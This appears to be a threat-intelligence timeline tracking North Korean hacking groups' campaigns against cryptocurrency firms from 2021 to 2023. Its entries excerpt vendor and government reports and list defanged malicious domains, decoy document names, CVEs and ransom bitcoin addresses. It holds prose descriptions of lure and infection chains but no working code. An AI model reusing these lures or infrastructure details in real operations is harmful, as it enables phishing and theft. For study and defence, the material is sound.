Rapid Change of Stablecoin (Protected).docx secure.azureword.com Z Venture Capital Presentation(Protected).docx

Date:: 2021-09-10 URL:: https://x.com/Circuitous/status/1436456000584880129 https://x.com/Circuitous/status/1442888312755302400 Tags:: Details:: Indicators::

North Korea Is Targeting South Korea's Bitcoin Exchanges, Report Claims

Date:: 2021-09-13 URL:: https://www.coindesk.com/markets/2017/09/12/north-korea-is-targeting-south-koreas-bitcoin-exchanges-report-claims Tags:: Details::

Since May 2017, we have observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds, Luke McNamara, a senior cyber threat intelligence analyst at FireEye, wrote in a blog post published Monday. The spearphishing we have observed in these cases often targets personal email accounts of employees at digital currency exchanges, frequently using tax-themed lures and deploying malware ... linked to North Korean actors suspected to be responsible for intrusions into global banks in 2016. Indicators::

Ghaleb Alaumary sentenced to 11 years in jail for laundering funds such as those coming from a banking heist by North Korean actors

Date:: 2021-09-16 URL:: https://justice.gov/opa/pr/international-money-launderer-sentenced-more-11-years-prison-laundering-millions-dollars Tags:: Money Laundering Details:: Indicators::

Multi-Universe Of Adversary: Multiple Campaigns Of Lazarus Group And Its Connection

Date:: 2021-10-07 URL:: https://vblocalhost.com/uploads/VB2021-Park.pdf Tags:: Applejeus, ThreatNeedle, DeathNote Details::

AppleJeus - Trojanized application, Spear phishing, Contact through social media, Use of Telegram channel - Installer, downloader, loader, backdoor
ThreatNeedle - Spear phishing, Trojanized application (a well-known program), Watering hole, Contact through social media - Installer, downloader, loader, injector, backdoor
DeathNote - Spear phishing, Trojanized application (PDF reader), Downloader, backdoor
Bookcode - Watering hole, Trojanized application (a security program) Installer, injector, backdoor
CookieTime - Spear phishing, Trojanized application (a well-known program), Downloader, loader, backdoor
Mata - Exploit vulnerable network device Loader, orchestrator, plug-ins Indicators::

2022

North Korean Hackers Have Prolific Year as Their Unlaundered Cryptocurrency Holdings Reach All-time High

Date:: 2022-01-13 URL:: https://blog.chainalysis.com/reports/north-korean-hackers-have-prolific-year-as-their-total-unlaundered-cryptocurrency-holdings-reach-all-time-high/ Tags:: Money Laundering Details:: Indicators::

Kapersky Report: SnatchCrypto Campaign

Date:: 2022-01-13 URL:: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/ Tags:: BlueNoroff Details:: Indicators::

In the spotlight: Lazarus Group

Date:: 2022-01-31 URL:: https://cybersecurity-help.cz/blog/2511.html Tags:: Details::

North Korea-linked advanced persistent threat (APT) groups are considered to be the world’s most advanced threat actors, on par with Russian, Chinese, or Iranian APTs. When conducting their operations, North Korean state-backed hackers leverage a wide array of sophisticated techniques, including the exploitation of zero-day vulnerabilities, the use of custom malware tools, as well as destructive malware and ransomware, and clever evasion and persistence mechanisms in order to fly under radar. Indicators::

North Korea Hacked Him. So He Took Down Its Internet

Date:: 2022-02-02 URL:: https://wired.com/story/north-korea-hacker-internet-outage/ Tags:: Details:: Indicators::

What Wicked Webs We Un-Weave

Date:: 2022-03-15 URL:: https://prevailion.com/what-wicked-webs-we-unweave/ https://x.com/PhantomXSec/status/1566219671057371136 https://x.com/PhantomXSec/status/1566219713600196608 Tags:: Details:: Indicators::

CVE-2022-1096 reported by anon type confusion V8

Date:: 2022-03-23 URL:: https://security.gentoo.org/glsa/202208-25 Tags:: CVE Details:: Indicators::

Mandriant: Mapping DPRK Cyber Threat Groups to Government Organizations

Date:: 2022-03-23 URL:: https://mandiant.com/resources/mapping-dprk-groups-to-government Tags:: Details::

The country's espionage operations are believed to be reflective of the regime's immediate concerns and priorities, which is likely currently focused on acquiring financial resources through crypto heists, targeting of media, news, and political entities, information on foreign relations and nuclear information, and a slight decline in the once spiked stealing of COVID-19 vaccine research. Information collected in these campaigns will possibly be used to develop or produce internal items and strategies, as in vaccines, mitigations to bypass sanctions, funding for the country’s weapons programs, and so on. Additional information continues to be collected to determine the extent to which these groups operate and streamline their operations. Being able to see though the intentional fog left by North Korean leadership, and able to identify targeting patterns that align to physical units allows for a proactive defense against these cyber operators. This effort is critical in a country where little is known to the outside world and defector reporting supplemented with cyber operations can help. Indicators::

CVE-2022-0609 Google posts update abt zero day CVE-2022-0609 Operation DreamJob and Operation AppleJeus

Date:: 2022-03-24 URL:: https://blog.google/threat-analysis-group/countering-threats-north-korea/ Tags:: Applejeus, Operation DreamJob, CVE Details::

TAG discovered two distinct North Korean attacker groups exploiting remote execution vulnerability
Operation DreamJob + Operation AppleJeus
Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (1️⃣ CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution hack capable of bypassing the lauded Chrome sandbox to move out onto the system.
2022-01-04 - CVE-2022-0609 - Earliest sighting of this particular kit
2022-02-10 - CVE-2022-0609 - Reported by Google TAGs Clément Lecigne use after free animation
2022-02-14 - CVE-2022-0609 - Chrome Update Released use after free animation Indicators::

CVE-2022-1096 Chrome Update Released type confusion V8

Date:: 2022-03-25 URL:: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html Tags:: CVE Details:: Indicators::

Lazarus Trojanized DeFi app for delivering malware

Date:: 2022-03-31 URL:: https://securelist.com/lazarus-trojanized-defi-app/106195/ Tags:: Details::

We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet, Indicators::

APT Group Lazarus Distributing Korean Phishing Lures to Feel Out Cryptocurrency Users

Date:: 2022-04-12 URL:: https://nsfocusglobal.com/apt-group-lazarus-distributing-korean-phishing-lures-to-feel-out-cryptocurrency-users/ Tags:: Details::

In this attack, Lazarus built a type of decoy document containing an AhnLab icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities.
Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform. Indicators::
확인자료 _20220329.docx Confirm data_20220329
202203_BTC_ETH_추가계정정보 202203_BTC_ETH_Other account information
202203_BTC_ETH_자동매매계정정보 202203_BTC_ETH_Auto Trading Account Information
202204_암호화폐_투자기획.docx 202204_Cryptocurrency_Investment Planning
NFT 분할.docx NFT allocation
Binance_Guide (1).doc Binance_Tutorial (1)

CVE-2022-1364: Reported by Google TAG's Clément Lecigne

Date:: 2022-04-13 URL:: https://issues.chromium.org/issues/40059369 Tags:: CVE Details::

Type Confusion, V8 Engine Indicators::

CVE-2022-1364 Chrome Update Released, everyone told to update urgently

Date:: 2022-04-14 URL:: https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html Tags:: CVE Details:: Indicators::

Ronin Bridge Hack Attributed to Lazarus Group, addresses added to OFAC list

Date:: 2022-04-14 URL:: https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20220414 Tags:: TraderTraitor Details:: Indicators::

0x098B716B8Aaf21512996dC57EB0615e2383E2f96

Tornado Cash uses Chainalysis Oracle to blcok OFAC addresses (from frontend)

Date:: 2022-04-15 URL:: https://x.com/TornadoCash/status/1514904975037669386 Tags:: Money Laundering Details:: Indicators::

North Korean State-Sponsored APT Targets Blockchain Companies

Date:: 2022-04-18 URL:: https://cisa.gov/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf https://cisa.gov/news-events/cybersecurity-advisories/aa22-108a Tags:: TraderTraitor Details:: Indicators::

How the DPRK became a hacking powerhouse and why it loves crypto

Date:: 2022-04-27 URL:: https://protos.com/how-the-dprk-became-a-hacking-powerhouse-and-why-it-loves-crypto/ Tags:: Money Laundering Details:: Indicators::

Guidance on the DPRK IT Workers

Date:: 2022-05-16 URL:: https://ofac.treasury.gov/media/923126/download?inline Tags:: DPRK-IT Details:: Indicators::

Insight: Crypto crash threatens North Korea's stolen funds as it ramps up weapons tests

Date:: 2022-06-29 URL:: https://reuters.com/technology/crypto-crash-threatens-north-koreas-stolen-funds-it-ramps-up-weapons-tests-2022-06-28/ Tags:: Money Laundering Details:: Indicators::

Here’s how North Korean operatives are trying to infiltrate US crypto firms

Date:: 2022-07-10 URL:: https://cnn.com/2022/07/10/politics/north-korean-hackers-crypto-currency-firms-infiltrate/index.html Tags:: DPRK-IT Details::

“He was a good contributor,” Devin lamented, puzzled by the man who had claimed to be Chinese and passed multiple rounds of interviews to get hired. (CNN is using a pseudonym for Devin to protect the identity of his company). Indicators::

AppleSeed Disguised as Purchase Order and Request Form Being Distributed

Date:: 2022-07-11 URL:: https://asec.ahnlab.com/en/36368/ Tags:: Details:: Indicators::

US disrupts North Korean hackers that targeted hospitals

Date:: 2022-07-19 URL:: https://apnews.com/article/technology-health-crime-lisa-monaco-government-and-politics-1c8384b8ea7a4cbe7fc1550c2f2eb110 Tags:: Details:: Indicators::

AppleSeed Being Distributed to Maintenance Company of Military Bases

Date:: 2022-07-28 URL:: https://asec.ahnlab.com/en/37078/ Tags:: Details:: Indicators::

Macro-Blocking & How Threat Actors Are Adapting

Date:: 2022-07-28 URL:: https://proofpoint.com/us/blog/threat-insight/how-threat-actors-are-adapting-post-macro-world Tags:: Details:: Indicators::

Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)

Date:: 2022-08-02 URL:: https://asec.ahnlab.com/en/37396/ Tags:: Kimsuky Details:: Indicators::

U.S. Treasury Sanctions Notorious Virtual Currency Mixer Tornado Cash

Date:: 2022-08-08 URL:: https://home.treasury.gov/news/press-releases/jy0916 Tags:: Details:: Indicators::

DTrack and Maui ransomware

Date:: 2022-08-09 URL:: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/ Tags:: Andariel Details::

DTrack, Maui
First seen date: April 15th 2021
Geolocation of the target: Japan
2020-12-25 Suspicious 3proxy tool
2021-04-15 DTrack malware
2021-04-15 Maui ransomware Indicators::

Suspected Tornado Cash developer arrested in Netherlands

Date:: 2022-08-11 URL:: https://therecord.media/suspected-tornado-cash-developer-arrested-in-netherlands Tags:: Details:: Indicators::

Trojanized Versions of PuTTY Client Application DPRK Job Opportunity Phishing via WhatsApp

Date:: 2022-09-14 URL:: https://cloud.google.com/blog/topics/threat-intelligence/dprk-whatsapp-phishing/ https://thehackernews.com/2022/09/north-korean-hackers-spreading.html Tags:: UNC2970, UNC4034 Details:: Indicators::

Lazarus ‘Operation In(ter)ception’ Targets macOS Users Dreaming of Jobs in Crypto

Date:: 2022-09-26 URL:: https://sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/ https://finbold.com/lazarus-hackers-target-macos-users-luring-them-with-crypto-dream-job-offers/ Tags:: Details:: Indicators::

ESET: Lazarus & BYOVD: Evil To The Windows Core

Date:: 2022-09-28 URL:: https://virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf Tags:: CVE Details::

BYOVD, CVE-2021-21551, FUDMODULE Indicators::

Microsoft: ZINC weaponizing open-source software

Date:: 2022-09-29 URL:: https://microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ Tags:: Diamond Sleet, UNC2970, UNC4034 Details::

ZINC, Diamond Sleet / UNC2970, UNC4034
Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.
Weaponized wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks
Observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.
The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions. Indicators::

Analysis Report on Lazarus Group's Rootkit Malware That Uses BYOVD

Date:: 2022-10-05 URL:: https://asec.ahnlab.com/wp-content/uploads/2022/10/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Oct-05-2022-3.pdf Tags:: Details:: Indicators::

U.S. targets North Korean fuel procurement network for breaching UN sanctions

Date:: 2022-10-07 URL:: https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20221007 https://home.treasury.gov/news/press-releases/jy1000 Tags:: Details:: Indicators::

North Korea's Crypto Hackers Are Paving the Road to Nuclear Armageddon

Date:: 2022-10-09 URL:: https://cnet.com/culture/features/north-koreas-crypto-hackers-are-paving-the-road-to-nuclear-armageddon/ Tags:: DPRK-IT Details::

The Democratic People's Republic of Korea, as North Korea is formally known, has come to depend more on crypto since the pandemic began. It historically relied on black market trade, exporting coal, meth, cigarettes and labor to Southeast Asia, Russia and especially China. But the zero COVID strategy of leader Kim Jong Un has closed borders, thinning the country's already slight revenues. Trade with China, by far North Korea's biggest economic partner, fell 80% in 2020, and reports of food shortages abound. At the same time, cryptocurrency values have skyrocketed. Indicators::

Lazarus Group Uses the DLL Side-Loading Technique (mi.dll)

Date:: 2022-10-12 URL:: https://asec.ahnlab.com/en/39828/ Tags:: Details:: Indicators::

With more than $3B already stolen, 2022 is on pace to become crypto’s ‘biggest year for hacking on record’

Date:: 2022-10-13 URL:: https://fortune.com/crypto/2022/10/13/october-record-3-billion-stolen-in-crypto-hacks-2022/ Tags:: Details:: Indicators::

Malicious app suspected to be created by a North Korean hacker organization aimed at stealing cryptocurrency discovered

Date:: 2022-10-25 URL:: https://boannews.com/media/view.asp?idx=110934 Tags:: Details:: Indicators::

Distribute AppleSeed to companies related to nuclear power plants

Date:: 2022-10-27 URL:: https://asec.ahnlab.com/ko/40552/ Tags:: Details:: Indicators::

No Pineapple! DPRK Targeting of Medical Research and Technology Sector

Date:: 2022-11-01 URL:: https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf Tags:: CVE Details:: Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed No Pineapple, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration Indicators::

₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware

Date:: 2022-12-01 URL:: https://volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/ Tags:: Applejeus Details::

Applejeus, JMT Trader, BloxHolder, OKX Fee Adjustment
In June 2022, the Lazarus Group registered the domain name bloxholder.com, and then configured it to host a website related to automated cryptocurrency trading. Indicators::
bloxholder[.]com

Lazarus group uses fake cryptocurrency apps to plant AppleJeus malware

Date:: 2022-12-05 URL:: https://malwarebytes.com/blog/news/2022/12/lazarus-group-uses-fake-cryptocurrency-apps-to-plant-applejeus-malware Tags:: Applejeus Details::

The campaign started when Lazarus Group registered the domain bloxholder[.]com. The website Lazarus Group built there is a clone of the legitimate website HaasOnline. HaasOnline is a Dutch company that developed HaasScript which is a crypto scripting language that allows users to create complex automated trading algorithms.
The cloned website distributed a Windows MSI installer that pretended to be an installer for the BloxHolder app. In fact, it was the AppleJeus malware bundled with the QTBitcoinTrader app, an open source cryptocurrency trading application which has been used by Lazarus before. Indicators::
strainservice[.]com
bloxholder[.]com
rebelthumb[.]net
wirexpro[.]com
oilycargo[.]com
telloo[.]io

Microsoft: DEV-0139 launches targeted attacks against the cryptocurrency industry

Date:: 2022-12-06 URL:: https://microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/ Tags:: Citrine Sleet, Applejeus Details::

AppleJeus, Citrine Sleet, OKX Fee Adjustment
We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system. Indicators::
Telegram Group: <> OKX Fee Adjustment
OKX Binance & Huobi VIP fee comparision.xls

Seoul: North Korean hackers stole $1.2B in virtual assets

Date:: 2022-12-22 URL:: https://apnews.com/article/technology-crime-business-hacking-south-korea-967763dc88e422232da54115bb13f4dc Tags:: Money Laundering Details::

North Korean hackers have stolen an estimated 1.5 trillion won ($1.2 billion) in cryptocurrency and other virtual assets in the past five years, more than half of it this year alone, South Korea’s spy agency said Thursday.
Experts and officials say North Korea has turned to crypto hacking and other illicit cyber activities as a source of badly needed foreign currency to support its fragile economy and fund its nuclear program following harsh U.N. sanctions and the COVID-19 pandemic.
South Korea’s main spy agency, the National Intelligence Service, said North Korea’s capacity to steal digital assets is considered among the best in the world because of the country’s focus on cybercrimes since U.N. economic sanctions were toughened in 2017 in response to its nuclear and missile tests.
The U.N. sanctions imposed in 2016-17 ban key North Korean exports such as coal, textiles and seafood and also led member states to repatriate North Korean overseas workers. Its economy suffered further setbacks after it imposed some of the world’s most draconian restrictions against the pandemic. Indicators::

SlowMist: Investigation of North Korean APT’s Large-Scale Phishing Attack on NFT Users

Date:: 2022-12-24 URL:: https://slowmist.medium.com/slowmist-our-in-depth-investigation-of-north-korean-apts-large-scale-phishing-attack-on-nft-users-362117600519 Tags:: Details:: Indicators::

2023

Lazarus The suspected APT-C-26 (Lazarus) organization conducts attack activity analysis through cryptocurrency wallet promotion information

Date:: 2023-01-11 URL:: https://mp.weixin.qq.com/s?biz=MzUyMjk4NzExMA==&mid=2247491718&idx=1&sn=71ac64eff7aa1dae857b12999ab03a4d&chksm=f9c1d38fceb65a9964858df003ac8fa8a17bf473be9de4b1e47543da3b203c0f0083f92d3e20&scene=178&cur_album_id=1915287066892959748#rd Tags:: Details::

Somora cryptocurrency wallet app, Powershell Indicators::
droidnation[.]net/nation.php

Kimsuky North Korea’s Cryptocurrency Craze and its Impact on U.S. Policy

Date:: 2023-01-12 URL:: https://cfr.org/blog/north-koreas-cryptocurrency-craze-and-its-impact-us-policy Tags:: Kimsuky Details::

Kimsuky distributed document-type malware targeting security experts, which uses an external object within a Word document to execute an additional malicious macro (template Injection method). Indicators::

Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

Date:: 2023-01-17 URL:: https://asec.ahnlab.com/en/45658/ Tags:: Details:: Indicators::

FBI: Confirms Lazarus Group Cyber Actors Responsible for Harmony's Horizon Bridge Currency Theft

Date:: 2023-01-23 URL:: https://fbi.gov/news/press-releases/fbi-confirms-lazarus-group-cyber-actors-responsible-for-harmonys-horizon-bridge-currency-theft Tags:: TraderTraitor Details:: Indicators::

2022 Biggest Year Ever For Crypto Hacking - Chainalysis

Date:: 2023-02-01 URL:: https://chainalysis.com/blog/2022-biggest-year-ever-for-crypto-hacking/ Tags:: Money Laundering Details::

2022 was the biggest year ever for crypto hacking, with $3.8 billion stolen from cryptocurrency businesses. Indicators::

Proofpoint: TA444 The APT Startup Aimed at Acquisition (of Your Funds)

Date:: 2023-02-03 URL:: https://proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds Tags:: DangerousPassword, TA444, APT38 Details::

In the world of tech startups, luminaries and charlatans alike boast of the value of rapid iteration, testing products on the fly, and failing forward. TA444, a North Korea-sponsored advanced persistent threat group, has taken these mantras to heart. TA444, which overlaps with public activity called APT38, Bluenoroff, BlackAlicanto, Stardust Chollima, and COPERNICIUM, is likely tasked with generating revenue for the North Korean regime. That tasking has historically involved the targeting of banks to ultimately funnel cash to the Hermit Kingdom or handlers abroad. More recently, TA444 has turned its attention, much like the tech industry, to cryptocurrency. While we do not know if the group has ping pong tables or kegs of some overrated IPA in its workspace, TA444 does mirror the startup culture in its devotion to the dollar and to the grind.
Back in its infant interest with blockchain and cryptocurrency, TA444 had two main avenues of initial access: an LNK-oriented delivery chain and a chain beginning with documents using remote templates. These campaigns were typically referred to as DangerousPassword, CryptoCore, or SnatchCrypto.
In 2022, TA444 continued to use both methods, but had also tried its hand at other file types for initial access. Despite having not heavily relied on macros in previous campaigns, TA444 seemed to mirror the cybercrime landscape in the summer and fall, attempting to find additional file types to stuff its payloads into. Indicators::

CISA: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

Date:: 2023-02-09 URL:: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a Tags:: Details::

The TTPs associated with DPRK ransomware attacks include those traditionally observed in ransomware operations. Additionally, these TTPs span phases from acquiring and purchasing infrastructure to concealing DPRK affiliation:
Acquire Infrastructure [T1583]. DPRK actors generate domains, personas, and accounts; and identify cryptocurrency services to conduct their ransomware operations. Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft.
Obfuscate Identity. DPRK actors purposely obfuscate their involvement by operating with or under third-party foreign affiliate identities and use third-party foreign intermediaries to receive ransom payments.
Purchase VPNs and VPSs [T1583.003]. DPRK cyber actors will also use virtual private networks (VPNs) and virtual private servers (VPSs) or third-country IP addresses to appear to be from innocuous locations instead of from DPRK.
Gain Access [TA0001]. Actors use various exploits of common vulnerabilities and exposures (CVE) to gain access and escalate privileges on networks. Recently observed CVEs that actors used to gain access include remote code execution in the Apache Log4j software library (known as Log4Shell) and remote code execution in unpatched SonicWall SMA 100 appliances [T1190 and T1133]. Observed CVEs used include:
CVE 2021-44228
CVE-2021-20038
CVE-2022-24990
Actors also likely spread malicious code through Trojanized files for “X-Popup,” an open source messenger commonly used by employees of small and medium hospitals in South Korea [T1195].
The actors spread malware by leveraging two domains: xpopup.pe[.]kr and xpopup.com. xpopup.pe[.]kr is registered to IP address 115.68.95[.]128 and xpopup[.]com is registered to IP address 119.205.197[.]111. Related file names and hashes are listed in table 1. Indicators::
14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
16sYqXancDDiijcuruZecCkdBDwDf4vSEC
1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn
bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135

Malware Disguised as Normal Documents

Date:: 2023-02-15 URL:: https://asec.ahnlab.com/en/47585/ Tags:: Kimsuky Details::

Same tactics used as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers; in this case, the threat actor used an image that prompts users to execute the macro. Indicators::

Økokrim has seized almost NOK 60 million in cryptocurrency. This is the largest amount of cryptocurrency ever seized by the Norwegian police

Date:: 2023-02-16 URL:: https://okokrim.no/record-cryptocurrency-seizure-in-the-axie-case.6585495-549344.html Tags:: TraderTraitor, Money Laundering Details:: Indicators::

Lazarus Anti-Forensic Techniques

Date:: 2023-02-23 URL:: https://asec.ahnlab.com/en/48223/ Tags:: Details::

The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions. Indicators::

WinorDLL64 backdoor from the vast Lazarus arsenal

Date:: 2023-02-24 URL:: https://welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/ Tags:: Details::

The WinorDLL64 payload serves as a backdoor that most notably acquires extensive system information, provides means for file manipulation, such as exfiltrating, overwriting, and removing files, and executes additional commands. Interestingly, it communicates over a connection that was already established by the Wslink loader.
In 2021, we did not find any data that would suggest Wslink is a tool from a known threat actor. However, after an extensive analysis of the payload, we have attributed WinorDLL64 to the Lazarus APT group with low confidence based on the targeted region and an overlap in both behavior and code with known Lazarus samples. Indicators::

Stealing the LIGHTSHOW LIGHTSHIFT and LIGHTSHOW

Date:: 2023-03-09 URL:: https://cloud.google.com/blog/topics/threat-intelligence/lightshow-north-korea-unc2970 https://cloud.google.com/blog/topics/threat-intelligence/lightshift-and-lightshow/ Tags:: UNC2970, UNC4034 Details::

Bring Your Own Vulnerable Device (BYOVD) Indicators::

CHM Malware Disguised as North Korea-related Questionnaire

Date:: 2023-03-13 URL:: https://asec.ahnlab.com/en/49295/ Tags:: Kimsuky Details::

The CHM file has been compressed and is being distributed as an email attachment. The first email that is sent pretends to be an interview request about matters related to North Korea. If the email recipient accepts the interview, then a password-protected compressed file is sent as an attachment. Not only is this email pretending to be a North Korea-related interview identical to the one previously analyzed, but it also follows the same format of sending the malicious file only when a recipient replies to the email. Indicators::

OneNote Malware Disguised as Compensation Form

Date:: 2023-03-24 URL:: https://asec.ahnlab.com/en/50303/ Tags:: Kimsuky Details:: Indicators::

Distributes Malware Disguised as Profile Template (GitHub)

Date:: 2023-03-29 URL:: https://asec.ahnlab.com/en/50621/ Tags:: Kimsuky Details:: Indicators::

Not just an infostealer: Gopuram backdoor deployed through 3CX supply chain attack

Date:: 2023-04-03 URL:: https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/ Tags:: Applejeus, Gopuram, 3CX Details::

